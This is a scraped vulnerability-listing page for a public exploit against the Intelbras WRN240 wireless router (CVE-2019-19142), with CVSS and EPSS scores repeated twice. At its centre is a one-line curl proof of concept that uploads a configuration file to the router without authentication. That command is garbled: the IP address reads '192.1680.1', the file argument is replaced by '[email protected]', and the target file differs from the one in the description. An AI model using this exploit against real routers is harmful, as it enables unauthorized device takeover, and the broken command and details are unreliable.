Elber TavaresEDB-ID:48158Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
0.015 Low
EPSS
Percentile
86.8%
# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.intelbras.com/
# Software Link: http://en.intelbras.com.br/node/1033
# Version: Intelbras Wireless N 150Mbps - WRN240
# Tested on: linux, windows
# CVE: CVE-2019-19142
Intelbras WRN240 devices do not require authentication to replace the
firmware via a POST request to the incoming/Firmware.cfg URI.
REFS:
https://fireshellsecurity.team/hack-n-routers/
https://github.com/ElberTavares/routers-exploit/
Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F [email protected]
http://192.1680.1/incoming/RouterBakCfgUpload.cfgRelated
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
0.015 Low
EPSS
Percentile
86.8%